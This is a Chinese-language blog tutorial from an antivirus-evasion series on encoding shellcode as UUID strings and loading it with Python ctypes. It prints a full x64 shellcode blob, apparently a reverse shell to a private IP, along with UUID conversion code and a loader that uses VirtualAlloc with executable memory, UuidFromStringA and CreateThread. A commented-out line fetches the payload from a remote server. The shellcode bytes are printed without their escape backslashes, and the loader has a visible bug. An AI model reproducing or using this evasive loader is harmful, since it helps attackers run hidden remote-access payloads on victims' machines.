免杀专题（四）UUID加载

UUID: 通用唯一标识符 ( Universally Unique Identifier ), 对于所有的UUID它可以保证在空间和时间上的唯一性. 它是通过MAC地址, 时间戳, 命名空间, 随机数, 伪随机数来保证生成ID的唯一性, 有着固定的大小( 128 bit ). 它的唯一性和一致性特点使得可以无需注册过程就能够产生一个新的UUID. UUID可以被用作多种用途, 既可以用来短时间内标记一个对象, 也可以可靠的辨别网络中的持久性对象.

python有根据十六进制字符串生成UUID的函数uuid.UUID()

https://docs.python.org/3/library/uuid.html

注意16个字节转换一个uuid值，x00是一个字节

当剩余字节数不满16个可添加x00补充字节数

但注意啊！必须将全部的shellcode全部转化为uuid

import uuid


scode = b"xfcx48x83xe4xf0xe8xccx00x00x00x41x51x41x50x52x51x48x31xd2x65x48x8bx52x60x56x48x8bx52x18x48x8bx52x20x48x8bx72x50x48x0fxb7x4ax4ax4dx31xc9x48x31xc0xacx3cx61x7cx02x2cx20x41xc1xc9x0dx41x01xc1xe2xedx52x41x51x48x8bx52x20x8bx42x3cx48x01xd0x66x81x78x18x0bx02x0fx85x72x00x00x00x8bx80x88x00x00x00x48x85xc0x74x67x48x01xd0x50x8bx48x18x44x8bx40x20x49x01xd0xe3x56x4dx31xc9x48xffxc9x41x8bx34x88x48x01xd6x48x31xc0x41xc1xc9x0dxacx41x01xc1x38xe0x75xf1x4cx03x4cx24x08x45x39xd1x75xd8x58x44x8bx40x24x49x01xd0x66x41x8bx0cx48x44x8bx40x1cx49x01xd0x41x8bx04x88x41x58x41x58x5ex48x01xd0x59x5ax41x58x41x59x41x5ax48x83xecx20x41x52xffxe0x58x41x59x5ax48x8bx12xe9x4bxffxffxffx5dx49xbex77x73x32x5fx33x32x00x00x41x56x49x89xe6x48x81xecxa0x01x00x00x49x89xe5x49xbcx02x00x22xb8xc0xa8x9fx94x41x54x49x89xe4x4cx89xf1x41xbax4cx77x26x07xffxd5x4cx89xeax68x01x01x00x00x59x41xbax29x80x6bx00xffxd5x6ax0ax41x5ex50x50x4dx31xc9x4dx31xc0x48xffxc0x48x89xc2x48xffxc0x48x89xc1x41xbaxeax0fxdfxe0xffxd5x48x89xc7x6ax10x41x58x4cx89xe2x48x89xf9x41xbax99xa5x74x61xffxd5x85xc0x74x0ax49xffxcex75xe5xe8x93x00x00x00x48x83xecx10x48x89xe2x4dx31xc9x6ax04x41x58x48x89xf9x41xbax02xd9xc8x5fxffxd5x83xf8x00x7ex55x48x83xc4x20x5ex89xf6x6ax40x41x59x68x00x10x00x00x41x58x48x89xf2x48x31xc9x41xbax58xa4x53xe5xffxd5x48x89xc3x49x89xc7x4dx31xc9x49x89xf0x48x89xdax48x89xf9x41xbax02xd9xc8x5fxffxd5x83xf8x00x7dx28x58x41x57x59x68x00x40x00x00x41x58x6ax00x5ax41xbax0bx2fx0fx30xffxd5x57x59x41xbax75x6ex4dx61xffxd5x49xffxcexe9x3cxffxffxffx48x01xc3x48x29xc6x48x85xf6x75xb4x41xffxe7x58x6ax00x59x49xc7xc2xf0xb5xa2x56xffxd5x00x00"
print(len(scode))


list = []
for i in range(len(scode)//16):
    bytes_a =scode[i*16:16+i*16]
    b = uuid.UUID(bytes_le=bytes_a)
    list.append(str(b))
print(list)

我们将shellcode16个一组转换为UUID

import ctypes
#import requests

scode = ['e48348fc-e8f0-00cc-0000-415141505251', '65d23148-8b48-6052-5648-8b5218488b52', '728b4820-4850-b70f-4a4a-4d31c94831c0', '7c613cac-2c02-4120-c1c9-0d4101c1e2ed', '48514152-528b-8b20-423c-4801d0668178', '0f020b18-7285-0000-008b-808800000048', '6774c085-0148-50d0-8b48-18448b402049', '56e3d001-314d-48c9-ffc9-418b34884801', 'c03148d6-c141-0dc9-ac41-01c138e075f1', '244c034c-4508-d139-75d8-58448b402449', '4166d001-0c8b-4448-8b40-1c4901d0418b', '58418804-5841-485e-01d0-595a41584159', '83485a41-20ec-5241-ffe0-5841595a488b', 'ff4be912-ffff-495d-be77-73325f333200', '49564100-e689-8148-eca0-0100004989e5', '0002bc49-b822-a8c0-9f94-41544989e44c', 'ba41f189-774c-0726-ffd5-4c89ea680101', '41590000-29ba-6b80-00ff-d56a0a415e50', 'c9314d50-314d-48c0-ffc0-4889c248ffc0', '41c18948-eaba-df0f-e0ff-d54889c76a10', '894c5841-48e2-f989-41ba-99a57461ffd5', '0a74c085-ff49-75ce-e5e8-930000004883', '894810ec-4de2-c931-6a04-41584889f941', 'c8d902ba-ff5f-83d5-f800-7e554883c420', '6af6895e-4140-6859-0010-000041584889', 'c93148f2-ba41-a458-53e5-ffd54889c349', '314dc789-49c9-f089-4889-da4889f941ba', '5fc8d902-d5ff-f883-007d-285841575968', '00004000-5841-006a-5a41-ba0b2f0f30ff', '415957d5-75ba-4d6e-61ff-d549ffcee93c', '48ffffff-c301-2948-c648-85f675b441ff', '006a58e7-4959-c2c7-f0b5-a256ffd50000']

#scode = requests.get("http://192.168.159.148:8000/456.txt").text

#scode = scode.strip("['").strip("']").split("', '")
print(scode)

rwxpage = ctypes.windll.kernel32.VirtualAlloc(0,len(scode)*16,0x1000,0x40)

rwxpage1 = rwxpage
for i in scode:
    io = ctypes.windll.Rpcrt4.UuidFromStringA(i,'rwxpage1')
    print(io)
    rwxpage1 += 16

hd = ctypes.windll.kernel32.CreateThread(0,0,rwxpage,0,0,0)

ctypes.windll.kernel32.WaitForSingleObject(hd,-1)

python2测试可以上线

但是这里要注意的是python3环境 ，使用UuidFromStringA写的时候返回值为1705，并不能成功。